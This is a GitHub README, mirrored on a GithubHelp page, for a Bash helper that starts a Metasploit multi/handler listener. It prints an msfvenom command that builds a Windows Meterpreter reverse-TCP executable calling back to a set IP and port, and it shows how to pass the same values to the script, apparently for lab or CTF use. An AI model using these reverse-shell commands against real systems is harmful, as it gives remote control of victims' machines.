GithubHelp home page GithubHelp logo

lazytitan33 / multihandler Goto Github PK

View Code? Open in Web Editor NEW
1.0 1.0 1.0 5 KB

Too lazy to start meterpreter, search for the multi handler, use it, set the payload, set the lhost, set the lport and then run it? .. takes a while, lots of things to type. No More!

Shell 100.00%

multihandler's Introduction

MultiHandler

Too lazy to start meterpreter, search for the multi handler, use it, set the payload, set the lhost, set the lport and then run it? .. takes a while, lots of things to type. No More!

Copy and paste your payload, IP and Port from the msfvenom command and execute it.

Example

Let's say you ran this msfvenom command to generate an executable binary for a reverse shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.41 LPORT=1337 -f exe -o lazy.exe

image

You would then normally need to:

  1. start Meterpreter
  2. search for the multi handler
  3. use it
  4. set the payload
  5. set the lhost
  6. set the lport
  7. execute it.

Those are a lot of steps and typing or copying and pasting. How about you run this script with the above highlighted part of the msfvenom command copied and pasted?

./MultiHandler.sh windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.41 LPORT=1337

image

You can also simply type (if you are into that sort of thing) the payload, IP and Port manually and it will work just the same.

./MultiHandler.sh windows/x64/meterpreter/reverse_tcp 10.10.16.41 1337

image

This quick bash script generates and runs a Meterpreter Resource Script that you can keep using or again, very simply generate another one for a different port if you want.

multihandler's People

Contributors

lazytitan33 avatar

Stargazers

 avatar

Watchers

 avatar

Forkers

brunorhis

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.